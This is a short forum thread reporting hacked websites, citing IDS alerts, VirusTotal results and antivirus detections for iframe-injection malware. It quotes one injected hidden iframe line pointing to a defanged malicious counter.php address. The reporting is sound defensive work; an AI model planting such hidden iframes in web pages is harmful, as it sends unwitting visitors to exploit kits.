polonus
1
See: http://urlquery.net/report.php?id=8005236
The IDS alert → 1:27242 ↔ ENABLED ↔ EXPLOIT-KIT embedded iframe redirection - possible exploit kit indicator (exploit-kit.rules)
DrWeb flags this as infested: htxp://www.turismopractico.com.ar/cuadro-visitas.htm infected with JS.IFrame.425
See: https://www.virustotal.com/nl/url/9abae7a2e4957b9fd3a1a39997b4fe314c566d9e945eb17cfa5305e0d37bec83/analysis/1385482291/
and
https://www.virustotal.com/nl/file/b6873d2f068be9c2864e285ba55b36dbd6b166991e81b61af803454ebb1b6b05/analysis/1381144876/
and we see that avast detects this as HTML:Iframe-ZG [Trj]
iFrame check on site gives: Suspicious
<iframe src="htxp://baleine-blanche.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px"
Host for http://censorthis.urlquery.net/report.php?id=5876451
Also at Injection check: Suspicious Text after HTML
polonus
2
Same snort alert other site: http://urlquery.net/report.php?id=8135652
We are being advised not to go to site: http://scanurl.net/?u=http%3A%2F%2Fmercantilexport.com%2F&uesb=Check+This+URL#results
blacklisted: http://maldb.com/mercantilexport.com/
Also infected with malware according to Sucuri’s: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fmercantilexport.com%2F
and zulu.zscaler: http://zulu.zscaler.com/submission/show/0f07de41b3796c42dd339ebe39ec61cc-1386110900
When you are not being stopped by Google Safebrowsing from going to this site, avast detect as HTML:Iframe-ZG [Trj]
There is also an old friend here doing the rounds: hxtp://mercantilexport.com/counter.php
Read on the malware connectionsn of counter.php: http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php
(above link article author = Vincente Diaz)
polonus
polonus
3